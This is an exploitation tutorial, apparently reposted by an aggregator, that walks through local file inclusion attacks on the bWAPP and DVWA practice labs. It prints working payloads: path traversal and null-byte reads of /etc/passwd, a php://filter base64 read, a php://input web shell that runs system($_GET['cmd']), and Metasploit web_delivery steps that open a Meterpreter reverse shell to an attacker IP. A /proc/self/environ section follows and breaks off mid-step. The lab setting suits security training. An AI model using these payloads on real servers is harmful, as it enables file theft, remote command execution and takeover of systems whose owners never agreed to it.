Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

5 ways to Exploit LFi Vulnerability

$
0
0

The main aim of writing this article is to share the idea of making an attack on a web server using various techniques when the server is suffering from file inclusion vulnerability. As we all are aware of LFI vulnerability which allows the user to include a file through URL in the browser. In this article I have used two different platform bWAPP and DVWA which contains file inclusion vulnerability and through which I have performed LFI attack in FOUR different ways.

Basic local file inclusion

Open target IP in the browser and login inside BWAPP as bee: bug now choose the bug remote & local file Inclusion then click on hack.


5 ways to Exploit LFi Vulnerability

Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL. To perform basic attacks manipulate

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.1.101/bWAPP/flfi.php?language=/etc/passwd

In basic LFI attack we can directly read the content of a file from its directories using (../) or simply (/) , now if you will notice the given below screenshot you will find that I have access the password file when the above URL is executed in the browser.


5 ways to Exploit LFi Vulnerability
Null byte

In some scenario the above basic local file inclusion attack may not work due to high security level. From below image you can observe now that I got fail to read the password file when executing the same path in URL. So when we face such kind of problem then go for NULL BYTE attack.

Now turn on burp suite to capture the browser request then select proxy tab and start intercept . Do not forget to set browser proxy while making use of burp suite


5 ways to Exploit LFi Vulnerability

Now inside burp suite send the intercepted data into repeater.


5 ways to Exploit LFi Vulnerability

Inside repeater you can do analysis of sent request and response generated by it. From screenshot it will be clear that /etc/passwd is not working and I am not able to read the password file.


5 ways to Exploit LFi Vulnerability

From following screenshot you can see I had forward the request by adding null character (%00) at the end of directory /etc/passwd%00 and click on go tab . Then on the right sight of window the password file get open as response.


5 ways to Exploit LFi Vulnerability
Base64 encoded

Now there is another way to exploit LFI when the security level is high and you are unable to view the PHP file content, and then use the following PHP function.

http://192.168.1.101/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource=/etc/passwd

Here from the screenshot you can see the content of password file is encoded into base64; copy the whole encoded text .


5 ways to Exploit LFi Vulnerability

I am using hackbar which a Firefox plugin to decode above copied text.


5 ways to Exploit LFi Vulnerability

Now a pop-up box will get open past the copied encoded text inside it and click on ok


5 ways to Exploit LFi Vulnerability

From the given screenshot you can view the result and read the content of password file.


5 ways to Exploit LFi Vulnerability
PHP Input

Using PHP input function we will execute injected PHP code to exploit LFI vulnerability. With the help of hackbar I am going to perform this task in which first we need to load the URL of the targeted web page as you can see in the given screenshot.

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go


5 ways to Exploit LFi Vulnerability

Now manipulate above URL using PHP input function

http://192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

Then select the check box to enable Post data which will forward the post request and add cmd commentin given text area <?php system($_GET[‘cmd’]); ?>as shown in following screenshot, finally click on execute.

This will show directories of victim PC.


5 ways to Exploit LFi Vulnerability

Now time to connect the victim through reverse connection; open terminal in kali linux and type msfconsole to start metasploit framework.

Now type use exploit/multi/script/web_delivery

msf exploit ( web_delivery )>settarget 1

msf exploit ( web_delivery )>set payload windows/meterpreter/reverse_tcp

msf exploit ( web_delivery )>set lhost 192.168.0.104

msf exploit ( web_delivery )>set srvport 8081

msf exploit ( web_delivery )>exploit

Copythe highlighted text shown in below window


5 ways to Exploit LFi Vulnerability

Pasteabove copied PHP code inside the URL as shown in the image and execute it.


5 ways to Exploit LFi Vulnerability

When above URL get execute the attacker got victim’s meterpreter session inside the metasploit.

msf exploit (web_delivery)>session I 1

meterpreter> sysinfo


5 ways to Exploit LFi Vulnerability
Proc/self/environ

If the server is outdated then to exploit it through LFI we can include proc/self/environ file that stores User_Agent where we will place our PHP code for executing CMD command.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page= proc/self/environ


5 ways to Exploit LFi Vulnerability

Now start burp suite and capture the browser request and send the fetch data into repeater.


5 ways to Exploit LFi Vulnerability
Add cmd commen

Viewing all articles
Browse latest Browse all 12749

Trending Articles